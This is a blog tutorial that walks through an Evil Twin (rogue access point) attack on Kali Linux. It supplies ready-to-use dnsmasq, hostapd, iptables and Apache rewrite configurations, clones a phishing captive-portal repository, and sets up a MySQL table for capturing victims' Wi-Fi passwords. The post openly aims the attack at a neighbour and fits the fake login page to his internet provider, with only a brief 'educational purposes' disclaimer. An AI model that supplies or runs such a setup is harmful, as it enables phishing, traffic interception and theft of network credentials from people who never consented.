Evil Twin Attack Example on Kali Linux
Thanos Stantzouris
Posted on January 15, 2021
Hello to all hackers, coders, designers, and overall tech lovers! My name is Thanos and I am a web developer by day and a hacker by night. These two crafts together, like the perfect fusion of Goten and Trunks, have given birth to a beautiful offspring of the well-known phishing attack named Evil Twin, or Rogue Access Point.
Let's dive in! Ready? GO!
Hol'Up!
Hacking without permission is a criminal offense. These tutorials and write-ups are for educational purposes only.
Anyway... take a look at that GitHub repo: AnonSurf πThank me later.
Note: This post is an original 15min read. You can find the entire, full of details, post on my Blog Sudorealm.
Preparing the Attack
For this attack, we mostly need:
- A Laptop or PC with Kali Linux in it... Somehow! Many are the ways of the force.
- The mighty Alfa Wireless WiFi network Adapter card
- Aircrack-n suite, for monitoring network traffic around us.
- hostapd, software that lets us make our wireless card broadcast Access Point signals.
- dnsmasq, Resolve DNS requests from or to a machine, Act as a DHCP server to allocate IP Addresses to the clients.
- iptables, Provide users with internet access, forward traffic from etho to the wlan0mon interface.
- Captive Portal Website, A web interface that will pop up when victim clicks its way into our Access Point.
- MySQL, Save the captured credentials to DB.
- apache2, Local Server for easy peasy lemon squeezy instant hosting.
- Patience and a clear mind. If you forget to bring this into your game, you are doomed.
Code and Lines and Lines of Code
Always start with an apt-get update
Install DNSmasq
apt-get install dnsmasq-y
Check or install hostapd
hostapd -h //To check if you have it installed
apt-get install hostapd //to install it
Wireless Adapter on Monitor mode
airmon-ng start wlan0
Setup DNSmasq conf
create a file named dnsmasq.conf and place inside the following:
#Set the wifi interface
interface=wlan0mon
#Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h
#Set the gateway IP address
dhcp-option=3,10.0.0.1
#Set DNS server address
dhcp-option=6,10.0.0.1
#Set Server
server=8.8.8.8
#logs
log-queries
log-dhcp
#Redirect all requests to 10.0.0.1
address=/#/10.0.0.1
Setup hostapd conf
Create a new file named hostapd.conf and write:
interface=wlan0mon
driver=nl80211
ssid=neighborAP
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
To find the name of your surrounding APs and the channels that they broadcast to run:
airodump-ng wlan0mon
Setup iptables rules
Create a new file named iptablesRules.sh
iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
You will need to chmod +x to be able to run in from a terminal.
Setup Apache2 Rewrite Rules
We need to add a few lines to our apache2 server configuration settings in order to make the captive portal pop up whenever the victim clicks on the access point!
To do so, type: gedit /etc/apache2/sites-enabled/000-default.conf
</VirtualHost> //Already exists
<Directory "/var/www/html">
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ / [L,QSA]
</Directory>
Copy and paste the chunk of code under the line of your apache2 configuration file!
After doing so, check if your apache2 rewrite module is enabled.
a2enmod rewrite
If it is, it will tell you so!
Setting up code for Captive Portal
Now, this section is tricky because it depends on your neighbor, and specifically on which internet provider he/she uses.
Mine uses Cosmote, so I had to code something to grab his attention.
On your terminal window:
cd /var/www/html
- git clone https://github.com/athanstan/EvilTwin_AP_CaptivePortal
Now paste the contents of evilTwin Folder to HTML directory.
Start the Apache2 Web Server
service apache2 start
So Far, So Good! But we need to make the webpage to store credentials to Database, which is the next step!
Setting up MySQL Database
If you open the dbconnect.php file on my repo, the following lines of code are the settings needed to create a successful connection with a Database.
//Database Connection Setup!
$host="localhost";
$username="dodgers";
$pass="duck";
$dbname="eviltwin";
$tbl_name="wpa_keys";
___
/]_/
|\/|.--/'-.
\|/:o / /\ ._,
\_/_.'0/ _|_
\____]] (>[___]=]]]===
/ \___/P{]
__// /----\/
(_[-'\__/_
/ | | \
'=='='=='
____||||___
(_""_/ \_""_)
Of the 24 and 1 half century
Get ready for some Code spraying
- Start MySQL servicee ```
root@kali:~# service mysql start
root@kali:~# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 38
Server version: 10.3.24-MariaDB-2 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
There is no password, just press enter. π
- Create your Database
MariaDB [(none)]> create database eviltwin;
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]> use eviltwin;
Database changed
MariaDB [eviltwin]>
- Create a new user and grant him all privileges for the DB
MariaDB [(none)]> create user dodgers@localhost identified by 'duck';
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]> grant all privileges on eviltwin.* to 'dodgers'@'localhost';
Query OK, 0 rows affected (0.000 sec)
- Create the table
MariaDB [eviltwin]> create table wpa_keys(password1 varchar(32), password2 varchar(32));
Query OK, 0 rows affected (0.015 sec)
MariaDB [eviltwin]> show tables;
+--------------------------+
| Hidden_NSA_Exploits |
+--------------------------+
| s3cretsSn0wdendoesntKnow |
+--------------------------+
| wpa_keys |
+--------------------------+
While you are in MariaDB you can also run raw SQL commands to do all kinds of stuff!
MariaDB [eviltwin]> insert into wpa_keys(password1, password2) values ("p@s$w0rd!@#", "p@s$w0rd!@#");
Query OK, 1 row affected (0.003 sec)
MariaDB [eviltwin]> select * from wpa_keys;
+-------------+-------------+
| password1 | password2 |
+-------------+-------------+
| p@s$w0rd!@# | p@s$w0rd!@# |
+-------------+-------------+
1 row in set (0.000 sec)
Here we added a set of passwords and then we saw what's inside the table wpa_keys. Pretty cool stuff right? Without even a sign of GUI.
Now you should have a cool Captive Portal up and running with no problems whatsoever, Only thing remaining to do is, **D E P L O Y**
You can continue reading about the Deployment Phase on [Sudorealm.com](https://sudorealm.com/blog/evil-twin-attack-guide#Deployment%20Phase)!
**BUT WAIT** Since you are about to dive into deep hacking waters, you should go in with style! π΅[Best Hacking Anthem Everrrrrr](https://www.youtube.com/watch?v=pFS4zYWxzNA)π΅
### Thank you for reading π»
![Super Sayans SWAG](https://media.giphy.com/media/Vbfme7uJCbIg8/giphy.gif)
### **Shoutouts**
Twitter: [@DevThanos](https://twitter.com/DevThanos)
Posted on January 15, 2021
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.